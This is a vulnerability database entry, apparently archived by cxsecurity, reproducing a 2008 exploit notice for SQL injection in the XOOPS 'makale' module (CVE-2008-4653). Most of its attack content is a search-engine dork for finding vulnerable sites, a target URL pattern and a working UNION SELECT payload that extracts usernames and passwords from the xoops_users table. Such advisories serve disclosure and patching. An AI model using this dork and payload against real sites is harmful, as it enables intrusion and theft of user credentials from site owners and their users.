Bug: XOOPS Module makale Remote SQL Injection Vulnerability (WLB-2008100206 Ascii Version)

English Version
WLB2

CVE WLB2

 Topic: XOOPS Module makale Remote SQL Injection Vulnerability
 Credit: EcHoLL
 Date: 2008.10.22
 CWE: CWE-89 (Show similar)
 CVE: CVE-2008-4653 (Show details)

Use CVE to see details like:
- CVSS2,
- Affected Software,
- References

Risk
Local
Remote
High
No
Yes

##########################################
#
# XOOPS Module: makale
#
#
##########################################
#
##AUTHOR : EcHoLL
####HOME : http://www.warezturk.org
#
####MAİL : echoll1983@hotmail.com
#
###########################################
#
# DORKS 1 : dork: /modules/makale/
###########################################

target: scriptpage.com/modules/makale/makale.php?id= [sql Code]

Sql code: 15+UNION+SELECT+0,1,2,3,uname,5,pass,7,8,9,10,11,12,13,14,15,16,17,18,19+from+xoops_users--

References:

http://www.securityfocus.com/bid/31834
http://www.milw0rm.com/exploits/6795
http://secunia.com/advisories/32347

[ ASCII VERSION ]

Copyright 2012, cxsecurity.com